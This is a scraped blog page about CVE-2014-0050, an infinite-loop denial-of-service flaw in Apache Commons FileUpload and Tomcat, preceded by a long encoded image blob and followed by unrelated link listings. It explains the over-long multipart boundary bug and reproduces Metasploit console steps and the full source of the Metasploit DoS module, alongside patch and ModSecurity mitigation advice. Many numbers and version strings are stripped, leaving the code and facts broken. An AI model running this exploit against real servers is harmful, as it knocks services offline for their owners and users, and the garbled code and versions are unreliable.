t0pf2Tih9FZvfquhelyFRkAo/kN/+tTTPttyotoyPtM+D9azTi4rtR+3wm7bfy6UUHk1Haab+a51/SYTLnZOnydWibJXNuG0Siq6icu2hcv7Rk9aLptS27l9waTqY+w9emde6OWLnk7pJW1iRfgWgBozlEB6eR4Tq0r4drUrnqxfUOpzQ8N1olAPLP2ErL6Ej3Mzkf8ZU+a6be8ys/N7+Q/GAySjvtxfFoGsM5J0uXr0PbLJlz2yASXUXl3EXj+qUlqxdNr23ZveTWcDL1Gb4UmfGitYbr0L4erknlqhfXO5zS8NxolYBn85v/Kz3mU3vzhXRPzHu756JtuJANHXL4OvMBi2p4z+kAFD3mw1ORqcj8DEXmN1JkAtv4zf9loj8u+zp7LiT/w8Zv0Z3znqv4uhX4jMPX+VamxtUzOti263rkUgCc7TGPEkWmIvMzFJlfTZEJbOD3PwAAAABAyBYqAAAAAEDIFioAAAAAQMgWKgAAAABAaPrrX/8SERERERERERERkW5soYqIiIiIiIiIiIiEsYUqIiIiIiIiIiIiEsYWqoiIiIiIiIiIiEiYO2yh/ue/T2//6z/C77bfOmMC84EWx+ffjU4RERERkZtEkSkiIiIix+QOW6j/+qdY7NaIZ1e3i6HnX/7nv0/T9G//+/+sOEXkdvnz++fyaYiIiFwRRabIWVFkiojIr8pNnnkXFohfXN12q5b3X1rotj926PNqpnn/+VhrZ3J2nTf/eyOnDrRqSpfPQURE5KIoMrdEkblhJopMERGRZ+cmj72b/Bl7r2y9cXX7V1y4fKagOXWURXW7diYfWIF80Oj156O6FRGRXxxF5sYoMqOZKDJvMrqIiMiHc5PHXlQgRv8Fq/86/u//2W2w4b8h1f2XXH+q23/7H1k/F9flqttoJpdXt5+/HfV5ioiI/JooMjdGkRnNRJF5k9FFREQ+nJs89vIasfvdRT36brPnT++753a7Lc580y35aX4wet3Wf+2X3RoxOr3YrDJK99zKuG11Gy3CYibdBWynFzXrXshiDvm59buZz7A9mIyb3779b0sREZHvjCLzv5OXJd3X9VInGas4pbWjdM+tjPv+bvviL0Vm0yy/ffvfliIiIt+Smzz2Nle3bRWb/B9Od86k/dZZfztg6tVt9YN/BQVNUoclBVDSbDj6qjl3x53/uup6o563zfmv3t9TSIYYtszbJJPpLksSpa2IiPzuKDJ/RJH5V1BNKTIVmSIiInlu8uQ7vLrdXHHWq9sT/3XV56vb4mSG33r/PLE40m1WGffz1W1yIfWV2TC96adoMmur23ozERGRJ0aR+SOKzL+CakqRqcgUERHJc5PH3oXV7eh/llr61tF35Tur2+6s6vPpfveS6nY4XH3+9XOHE1bdioiIrI8i80cUmX8F1ZQiU5EpIiKS5yaPvfzP3vdUt8MydEM5e/rfFPh8dVssYYs9bJtzd9zPV7d7hjj83Pag6lZERGRNFJk/osj8K6imFJmKTBERkTx3eOx1/8NS81J1cXBxyqJZe9aw7oz+l6zRt3b+l7AKd2UmOv6ubxYt2zbRwfnx4nySmRSnl1xdO+JfszIuGiW6tMVZ9eltaFm5tOgS8nXuXm93WfLbd9Q7U0RE5KuiyFxmUVF0j0+KzJ5uJ6umt6Fl5dKiS8jXuXu93WXJb99R70wREZH7x2PvjlGOWOdjL/OXXKmIiIjkURJY52Mv85dcqYiIyF+2UG+Y6E+YxTqLiIiIbI7ixzqLiIjI5ni0i4iIiIiIiIiIiISZXgAAAAAABGyhAgAAAACEbKECAAAAAIRsoX7C+z8qf/VEOuZz2zzP9pRuV4evwCEdDi/57Bv3+bdHdHeiaZw3t9v+vjjPJet8nuLvfQBOcudPXUWmInM4DUXmgRSZAGfzAXS6+af8PT/x54+iQ+q8Ym/7HdX/GfO821olQw8PnjroPX9TnG3zVd98uS58PwP8QorM8ygy91BkXkiRCXAeH0B7FcvB+R/Cf2Jaa5xX3Z7qwPW8Q3X7earbCz2+ugVgP0Xm5mY7KTJ3UmReSJEJcB6fRNvNq6voM71tMzUW7Re15vysvFm3w27nbW/thRSH2NZs7fVGl/P6uarFE/NpJ82ig4vTo0WI5lAfonKB9fXv9pPPJJnG8JKj6x12WLnS4Vrl65xfYPHcyiIsrjq/2EVv0fUuTu9eQjRK0niou3TFy6/MuXvtq2YI8L3en36v5pGRtJkai/btx+yreQRs+3iPmnUvpDjEtmZrrze6nNfPVS2emE87aRYdXJweLUI0h/oQlQusr3+3n3wmyTSGlxxd77DDypUO1ypf5/wCi+dWFmFx1fnFLnqLrndxevcSolGSxkPdpStefmXO3WtfNUPg1/JhscvwM/f90dz9dd4mOdg+oqJz28678xme222W9JzMsNgsud7IYqqL5+LwxG4n3XPz1Vi7Vknnw+GGfdbfV9EMhwe761xc+W6DvMO8z+Ja5cvSvi3r526Yc9Kgcqcqb5hVS7qzaiz+3k/O2jBngN9g+kfSIPl13iY5WKzNup135zM8d23hVHzQFC9k1XOqe2LeQ/cBl0w+X421a5V0PhxuVelSqS4q80mmMSzYKv3vqS6Ka5UvS/u2rJ+7Yc5Jg8qdqrxhVi1p/XdcV/H3fnLWhjkD5Hxe7DL9I2mQ/DpvE/WZVIpts7bz7nwWr+vTSyaTfJk0m8vP7fYWnZh30n2yJue2pcB86OLFViYTTa/eYX7rF+/VYYFVn1L99hWvt/ve2DCxDXOuvEvfx9v5bL7v0dDDE/P35HBJixOO5Ks3PDef8/v1zkkCfKPiQzD6dd4m6jPqvNts+IGcPG0r00smk3yZNGufevWnSXJi3kn+CMsf6/kDPTqrOJloevUO81tfqS6GB5O3UGWSxevtvjc2TGzDnCvv0vfxdj6b73s09PDE/D05XNLihCP56g3Pzef8fr1zksBv4yNju/nHbl7itJ/gO8uFqNnwSTAcq/Kkybvd2WxDcZDPef+59e9Wjg+brV38VZMZdjg8mLzeNsP8PVnvLbm0VXNeVa5tfg9vW/xum51LelV12/3sajtR3QK/kyIzOq7IHM5hw3CKzG0TWztnReYqikzghnxk7DX82O1++g8fP8kzKWn2vdXt/rLm89XttrVKOq8MV+9tWNEeWN1uqGm2zXntxDbMee25a+ecNCj+FDE8a8/boPhTSnL62rOGvwd3zhDgeyky2+OKzOEcNg9X702RuW3OikxFJvDtfEZ8wjQTHWmPLwybvWbPieTJHc3k/WX3+KKHaCbRpUXXEk0mmn97VrfnVT0Mx52CxU+OrJ1GfYi8w2gyU6rbJj9xcYH16S2WJeowupDoYodrtbbZUefmc24v9n0w6a092D2xbVyZ83D+yYUUV6B7ejKH7sVWZgjwG+TPlKhl9+M3afZSZCoyFZmKzF7P9QsZzj+5kOIKdE9P5tC92MoMgV/LZ8Q1rvp09lTYwKINJbXIx8bdc65bPHer1bjVZAC+giLzi1i0IUXmk9xqNW41GeBb+OC4QP3P0J4x7peyXKt8frn2j+gWL9xqNdwdgA0UmV/Bcq2iyHyAW62GuwNs5oMDAAAAACBkCxUAAAAAIGQLFQAAAAAgZAsVAAAAACBkCxUAAAAAIGQLFQAAAAAgZAsVAAAAACBkCxUAAAAAIGQLFQAAAAAgZAt1r2myhgAAHEyRCQBwHyqz7f7UtfNfAQBgJ0UmAMDdqMl2mf5x9UQAAHgORSYAwK0oy3ZR3QIAcDhFJgDArSjLtvNvrAAAOJwiEwDgbtRke6lrAQA4nCITAOA+VGYAAAAAACFbqAAAAAAAIVuoAAAAAAAhW6gAAAAAACFbqAAAAAAAIVuoAAAAAAAhW6gAAAAAACFbqAAAAAAAIVuoAAAAAAAhW6gAAAAAACFbqAAAAAAAIVuoAAAAAAAhW6h7TZM1BADgYIpMAID7UJlt96eunf8KAAA7KTIBAO5GTbbL9I+rJwIAwHMoMgEAbkVZtovqFgCAwykyAQBuRVm2nX9jBQDA4RSZAAB3oybbS10LAMDhFJkAAPehMgMAAAAACNlCBQAAAAAI2UIFAAAAAAjZQgUAAAAACNlCBQAAAAAI2UIFAAAAAAjZQgUAAAAACN1kC/U/RERERERERERERG4YW6giIiIiIiIiIiIiYWyhivzINE2Xz+HZmf7R/VJERETkkVHtfGCFFZm/J+6siHw+tlA/ssofeX7/6f/963vE4eirpveBq7iw3JkPOv30yOutzO3URc4P7ulQRETkN0SRuWGtFJmXR5H5mffAITN87ficaU/pdrV5Be65dCLy4NhCPX+JfxZMZw/0HmLxzFs1z7OnWhn0Y+uWX/WxQ9/tejcsyEktP/BT0+WLKSIicmwUmdsGVWTeIYrMe96XxQznv+v3L0Kxtw8svojItthC3b2CtcfJvNY8Yw7tn2R+e3V7+WTOGPpW17t5Tc5oedvqVkRE5KooMg9cPUXmJ69385qc0fK2ReZv3kK9w/qLiGyILdQda/fz3zQV2yzq3UXpWTlSmc9r9szrlrltn92JFedWbNm+6LZczCoZontRUQ95h9FN3HAV3dc3vN5KFud2XydDRAfzdd4wvQ3vNBERkdvm/Qh7xY/Itk336T9vPzxSmc8rftouvrs4/RU/lJMjxZbti27LxaySIboXFfWQdxjdxA1X0X19w+utZHFu93UyRHQwX+cN09vwTqsP0b7u3o5kPu0d2XZu1OHi1/rbYFuz/PT20jbfXxGRbZmu3jz94/qF2Lh8wYf+vEHy67xN92C3WTJQ+6J95kUdFp9GSbN8ztHTMVrVtc2KS1q5Efn1dvupjHu3661k1f0dnltf582T7N6jnf2LiIh8PopMRaYiM5rzM4rMaaZ+15Lfd2vP3XB/V618d3prm80nc/j9FRFZm+nqzdM/rl+IjcvXe+wtGnR/fQVPuMWjtD1SGSgautug+GWl2eJ1Uo0NR8mnGs0kL0SSamDVKMM1z5flPtdbSXJ1wzdMNMO174RVk6zcERERkftnWP61z/f5U29YNiSFRDJQNHS3QfHLSrPF652lxeeLruIowzXPl+U+11tJcnXDN0w0w7XvhFWTrNyRPZ3n17t4HY1eXKv2znYPtvd37dtvOL2oWXfOq5ZRROSMTFdvnv5x/UJsWbtC0fD+btQsf/YUHwlTI5peMtzmJ1z7ujLc8ALXnjuc8LDaWztK0sPa8uKS660kubpKxTbss7IyqyZZuSMiIiI3jyIz6lCRqciszLDSeO0kK3dkT+fF652PW1mZ4hujONbat9/+3/sblktE5LxMV2+e/nH9QmxfwdGndveRUCyJioVR0v7z1e2qJ2ulLtlz7rA4W1uiHVvdXnW93ZJreLvzGRarvfrV1euhbdXtqiFEREQ+H0Vmcc6KzPtcryKzPkTxN0J33KPOrdzf+RWtWvl8Afevc9KhiMhJma7ePP3j+oU4d5VnoiOL48mRaIhX/JyLhp5/Nxq6exX5heRDdBcnX5Z8MvlaTT3dlXk1D+zoKqKek3Fvdb3dEYtv3XahojknM4zewElXw+lN8T1KlrSyCCIiIrdN+6ROnt2VQqI7xGv2pO6WFu3QbeGRPIW7zZIToyG6i5MvSz6ZfK2mnu7KvH6WOslVRD0n497qersjFt+67UJFc05mGL2Bk66G05vie5QsabH/+rK0I3bHPerc9svKzCsLmDerzzm64yIi58UWquzK855ba6/oS1dgz7R3XnJen31yYb/03omIiPyGPO8xrcg8+5J/T5G52G08+3LumV974SJyYWyhyvZEdcnvyTeuwJ4Jf+Z6nzGEiIiIbM43llhWQJH5mSE+uWIiIjKPLVQRERERERERERGRMLZQRURERERERERERMLYQhUREREREREREREJYwtVREREREREREREJIwtVBERERF5Zv7v/xUREREROSC2UEVERETkmbm81BYRERGRZ8QWqoickm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" alt="" />

The fixed code has an extra "if" condition (line number 330) that validates the length of the multipart boundary to be shorter than 4091 characters, raising an exception if that's not the case. The calculation is as follows:

boundary.length > bufSize –  – BOUNDARY_PREFIX.length =  –  –  =

//parts of the code were copied into the org.apache.tomcat.util.http.fileupload package in Apache Tomcat, causing it to be affected.

0x2: Creating the exploit

So let's get Apache Tomcat installed and try to send more than 4091 characters in the boundary field to the Apache Tomcat Manager application. Such a request might look like this:

0x3: Why is this happening

While parsing the multipart message, the following "for" loop is used by the MultipartStream class:

The innocent-looking "for" loop above is an endless loop. It is "family related" to the famous "while(true)" loop. The developer's intention was to exit this loop either by raising an exception (line 1003) or by returning a value (line 1014), unfortunately when the boundary is longer than 4091 characters (as explained earlier) and the body is longer than 4096 characters (so it can potentially contain the boundary), neither would ever occur

Relevant Link:

https://www.trustwave.com/Resources/SpiderLabs-Blog/CVE-2014-0050--Exploit-with-Boundaries,-Loops-without-Boundaries/

3. POC

0x1: Metasploit

msf > use auxiliary/dos/http/apache_commons_fileupload_dos

msf auxiliary(apache_commons_fileupload_dos) > show actions

    ...actions...

msf auxiliary(apache_commons_fileupload_dos) > set ACTION <action-name>

msf auxiliary(apache_commons_fileupload_dos) > show options

    ...show and set options...

msf auxiliary(apache_commons_fileupload_dos) > run

0x2: apache_commons_fileupload_dos.rb

##

# This module requires Metasploit: http://metasploit.com/download

# Current source: https://github.com/rapid7/metasploit-framework

##

require 'msf/core'

class Metasploit4 < Msf::Auxiliary

  include Msf::Exploit::Remote::HttpClient

  include Msf::Auxiliary::Dos

  def initialize(info = {})

    super(update_info(info,

      'Name'            => 'Apache Commons FileUpload and Apache Tomcat DoS',

      'Description'     => %q{

        This module triggers an infinite loop in Apache Commons FileUpload 1.0

        through 1.3 via a specially crafted Content-Type header.

        Apache Tomcat  and Apache Tomcat  use a copy of FileUpload to handle

        mime-multipart requests, therefore, Apache Tomcat 7.0. through 7.0.

        and 8.0.-RC1 through 8.0. are affected by this issue. Tomcat  also

        uses Commons FileUpload as part of the Manager application.

       },

       'Author'         =>

         [

           'Unknown', # This issue was reported to the Apache Software Foundation and accidentally made public.

           'ribeirux' # metasploit module

         ],

       'License'        => MSF_LICENSE,

       'References'     =>

         [

           ['CVE', '2014-0050'],

           ['URL', 'http://tomcat.apache.org/security-8.html'],

           ['URL', 'http://tomcat.apache.org/security-7.html']

         ],

        'DisclosureDate' => 'Feb 6 2014'

      ))

      register_options(

        [

          Opt::RPORT(),

          OptString.new('TARGETURI', [ true,  "The request URI", '/']),

          OptInt.new('RLIMIT', [ true,  "Number of requests to send",])

        ], self.class)

  end

  def run

    boundary = ""*

    opts = {

      'method'         => "POST",

      'uri'            => normalize_uri(target_uri.to_s),

      'ctype'          => "multipart/form-data; boundary=#{boundary}",

      'data'           => "#{boundary}00000",

      'headers' => {

        'Accept' => '*/*'

      }

    }

    # XXX: There is rarely, if ever, a need for a 'for' loop in Ruby

    # This should be rewritten with .upto() or Enumerable#each or

    # something

    for x in ..datastore['RLIMIT']

      print_status("Sending request #{x} to #{peer}")

      begin

        c = connect

        r = c.request_cgi(opts)

        c.send_request(r)

        # Don't wait for a response

      rescue ::Rex::ConnectionError => exception

        print_error("#{peer} - Unable to connect: '#{exception.message}'")

        return

      ensure

        disconnect(c) if c

      end

    end

  end

end

Relevant Link:

https://www.rapid7.com/db/modules/auxiliary/dos/http/apache_commons_fileupload_dos

https://raw.githubusercontent.com/rapid7/metasploit-framework/master/modules/auxiliary/dos/http/apache_commons_fileupload_dos.rb

4. Solution

0x1: Defend yourself 

. Once available, update your software to one of the following versions:

Apache Commons FileUpload 1.3.

Apache Tomcat 7.0.

Apache Tomcat 8.0.

. You may choose to apply the appropriate patch:

Apache Commons FileUpload: http://svn.apache.org/r1565143

Apache Tomcat : http://svn.apache.org/r1565163

Apache Tomcat : http://svn.apache.org/r1565169

0x2: ModSecurity Commercial Rule Set

SecRule REQUEST_HEADERS:Content-Type "@rx .{4000}"

Relevant Link:

http://tomcat.apache.org/security-7.html

Copyright (c) 2015 Little5ann All rights reserved

CVE-2014-0050: Exploit with Boundaries, Loops without Boundaries、Apache Commons FileUpload and Apache Tomcat DoS的更多相关文章

  1. <2014 08 29> MATLAB的软件结构与模块、工具箱简示

    MATLAB的系统结构:三个层次.九个部分 ----------------------------------- 一.基础层 是整个系统的基础,核心内容是MATLAB部分. 1.软件主包MATLAB ...

  2. 2014.1.21 DNS大事故(dns原理、网络封锁原理)

    1.21那天发生了什么,由1.21联想补充……  很多网站都上不去,域名解析都到了65.49.2.178这个IP地址 先科普,再深挖  dns查询类型 递归查询,迭代查询   DNS解析过程,这里使用 ...

  3. 小白日记15:kali渗透测试之弱点扫描-漏扫三招、漏洞管理、CVE、CVSS、NVD

    发现漏洞 弱点发现方法: 1.基于端口服务扫描结果版本信息,比对其是否为最新版本,若不是则去其 官网查看其补丁列表,然后去逐个尝试,但是此法弊端很大,因为各种端口应用比较多,造成耗时大. 2.搜索已公 ...

  4. fastjson反序列化漏洞原理及利用

    重要漏洞利用poc及版本 我是从github上的参考中直接copy的exp,这个类就是要注入的类 import java.lang.Runtime; import java.lang.Process; ...

  5. J2EE项目开发中常用到的公共方法

    在项目IDCM中涉及到多种工单,包括有:服务器|网络设备上下架工单.服务器|网络设备重启工单.服务器光纤网线更换工单.网络设备撤线布线工单.服务器|网络设备替换工单.服务器|网络设备RMA工单.通用原 ...

  6. J2EE相关总结

    Java Commons The Java™ Tutorials: http://docs.oracle.com/javase/tutorial/index.html Java Platform, E ...

  7. DatagramChannel

    DatagramChannel 最后一个socket通道是DatagramChannel.正如SocketChannel对应Socket,ServerSocketChannel对应ServerSock ...

  8. Servlet实现文件上传

    一.Servlet实现文件上传,需要添加第三方提供的jar包 下载地址: 1) commons-fileupload-1.2.2-bin.zip      :   点击打开链接 2) commons- ...

  9. 使用jetty和mongodb实现简易网盘接口

    依赖库: 1,jetty(提供http方式接口) 2,mongodb的java驱动(访问mongodb存取文件) 3,thumbnailator包,进行缩略图生成 4,commons-fileuplo ...

随机推荐

  1. windows 下 redis for php 配置

    下载 redis,下载地址 https://github.com/dmajkic/redis/downloads,下载下来 zip 文件,解压,根据系统选择解压的文件夹(比如我的是 64bit). 我 ...

  2. 拥抱HTML5 — Page Visibility(页面可见性) API介绍

    H5 提供了很多简单实用的 API,Page Visibility API 就是其中之一. 不知道用户是不是在与页面交互,这是困扰广大 Web 开发人员的一个主要问题.如果 页面最小化了 或者 隐藏在 ...

  3. 一起来学node.js吧 node school简介

    node.js这几年火爆的简直丧心病狂,去lagou.com查查node.js的职位,那叫一个多. 要说火爆到什么程度,竟然有一个网站专门去教大家学习node.js, Node School. 进去逛 ...

  4. iostat命令详解

    iostat iostat用于输出CPU和磁盘I/O相关的统计信息. 命令格式: iostat [ -c | -d ] [ -k | -m ] [ -t ] [ -V ] [ -x ] [ devic ...

  5. Ubuntu Terminal Shortcut

    Not all of the shortcuts are useful.Only remeber the most useful. 移动类Ctrl + a  - Jump to the start o ...

  6. Oracle 11g 7个压缩包说明

    最初,我以为都要解压.无意间看到的一博客,明白压缩包的含义.哈哈 Oracle11g有多张安装光盘: 文件名称                                              ...

  7. 1104关于优化mysql服务器几个参数和思路

    转自http://www.cnblogs.com/AloneSword/p/3207697.html 按照从大到小,从主要到次要的形式,分析 mysql 性能优化点,达到最终优化的效果. 利用 min ...

  8. Qt5.3.0 for Android开发环境配置

    1.去官网下载Qt5.3.0 for Android 2.去http://developer.android.com下载Ndk 和SDk            3.去http://ant.apache ...

  9. javascript获得客户端IP的又一方法

    <script language="JavaScript">VIH_BackColor = "palegreen";VIH_ForeColor = ...

  10. ubuntu 下mysql中文乱码问题解决方案

    mysql> show variables like 'character%';+--------------------------+----------------------------+ ...